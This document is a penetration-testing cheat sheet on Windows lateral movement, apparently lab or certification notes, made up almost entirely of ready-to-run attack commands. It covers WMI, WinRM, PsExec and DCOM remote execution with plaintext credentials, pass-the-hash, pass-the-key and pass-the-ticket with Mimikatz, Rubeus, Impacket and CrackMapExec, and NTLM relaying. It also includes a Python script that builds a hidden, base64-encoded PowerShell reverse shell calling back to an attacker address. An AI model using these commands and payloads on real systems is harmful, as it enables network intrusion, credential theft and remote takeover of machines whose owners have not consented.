Lateral Movement

Lateral Movement

WMI / WinRM

# WMI 135 : Remote Procedure Calls (RPC)
# We need the credentials of a member of the Administrators local group
wmic /node:192.168.50.73 /user:jen /password:Nexus123! process call create "calc"
# with Powershell we can use it to get rev shell after base64 encoding
$username = 'jen'; $password = 'Nexus123!'; $secureString = ConvertTo-SecureString $password -AsPlaintext -Force; $credential = New-Object System.Management.Automation.PSCredential $username, $secureString; $options = New-CimSessionOption -Protocol DCOM; $session = New-Cimsession -ComputerName 192.168.189.73 -Credential $credential -SessionOption $Options; $command = 'calc'; Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};

# WinRM 5986,5985 : Microsoft Windows Remote Management
# We need a domain user with Administrators or Remote Management priv
winrs -r:files04 -u:jen -p:Nexus123!  "cmd /c hostname & whoami"
# Powershell
$username = 'jen'; $password = 'Nexus123!'; $secureString = ConvertTo-SecureString $password -AsPlaintext -Force; $credential = New-Object System.Management.Automation.PSCredential $username, $secureString; New-PSSession -ComputerName 192.168.189.73 -Credential $credential;
Enter-PSSession 1

Python code to encode PS rev shell payload with base64

import sys
import base64
payload = '$client = New-Object System.Net.Sockets.TCPClient("192.168.118.2",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()
print(cmd)

PsExec

# We need a user of Administrators local group, ADMIN$ share must be available, File and Printer Sharing has to be turned on
.\PsExec64.exe -i  \\FILES04 -u corp\jen -p Nexus123! cmd

Pass the Hash (PtH)

# Pass the Hash from Windows Using Mimikatz:
mimikatz.exe privilege::debug "sekurlsa::pth /user:<user> /rc4:<hash> /domain:<domain> /run:cmd.exe" exit

# Pass the Hash with PowerShell Invoke-TheHash (Windows)
Import-Module .\Invoke-TheHash.psd1
Invoke-SMBExec -Target <IP> -Domain <domain> -Username <user> -Hash <hash> -Command "whoami" -Verbose

# Pass the Hash with Impacket (Linux) / impacket-wmiexec impacket-atexec impacket-smbexec
impacket-psexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453

# Pass the Hash with CrackMapExec (Linux)
crackmapexec smb 172.16.1.0/24 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453 -x whoami

# Pass the Hash with evil-winrm (Linux)
evil-winrm -i 10.129.201.126 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453

# Enable Restricted Admin Mode to Allow PtH with RDP
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
# Pass the Hash with RDP (Linux)
xfreerdp  /v:10.129.201.126 /u:julio /pth:64F12CDDAA88057E06A81B54E73B949B

Pass the Key / OverPass the Hash

# Mimikatz - Pass the Key/OverPass the Hash
sekurlsa::pth /domain:domain.htb /user:user /ntlm:3f74aa8f08f712f09cd5177b5c1ce50f /run:powershell

# Generate a TGT by authenticating to a network share. Converting NTLM hash to Kerberos TGT
net use \\files04
klist                        # Listing Kerberos tickets
.\PsExec.exe \\files04 cmd   # Opening remote connection using Kerberos auth

# Mimikatz - Extract Kerberos Keys
sekurlsa::ekeys

# Rubeus - Pass the Key/OverPass the Hash
Rubeus.exe asktgt /domain:domain.htb /user:user /aes256:b21c99f..SNIP..da3fe60 /nowrap

Pass the Ticket (PtT)

# Pass the Ticket :  export a TGS ticket of a user and use it to authenticate to a specific service
# Mimikatz - Export Tickets
sekurlsa::tickets /export

# Rubeus - Export Tickets
Rubeus.exe dump /nowrap

# Rubeus Pass the Ticket
Rubeus.exe asktgt /domain:domain.htb /user:user /rc4:3f74a71..SNIP..2f077b1ce50f /ptt
# Another way is to import the ticket into the current session using the .kirbi
Rubeus.exe ptt /ticket:RND-user@krbtgt-domain.htb.kirbi
# Convert .kirbi to Base64 Format
[Convert]::ToBase64String([IO.File]::ReadAllBytes("RND-user@krbtgt-domain.htb.kirbi"))
# Pass the Ticket - Base64 Format
Rubeus.exe ptt /ticket:doIE1jCCBNKgAwIBBaEDAgEWooID+TCCA/VhggPxMIzSrk/gHuER2XRLdV/<SNIP>

# Mimikatz - Pass the Ticket
kerberos::ptt "C:\path\Mimikatz\RND-user@krbtgt-domain.htb.kirbi"
exit
dir \\DC01.inlanefreight.htb\c$

# Mimikatz - PowerShell Remoting - Pass the Ticket
kerberos::ptt "C:\path\Mimikatz\RND-user@krbtgt-domain.htb.kirbi"
exit
powershell
Enter-PSSession -ComputerName DC01

DCOM

# we need RPC port 135 and local administrator access
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","192.168.163.73"))
$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e base64_revshell_encode","7")

Relaying Net-NTLMv2

# Starting ntlmrelayx for a Relay-attack targeting 192.168.0.2 : using www.revshells.com Powershell #3 (Base64)
impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.0.2 -c "powershell -e JABjAGwAaQBlAG4AdA..."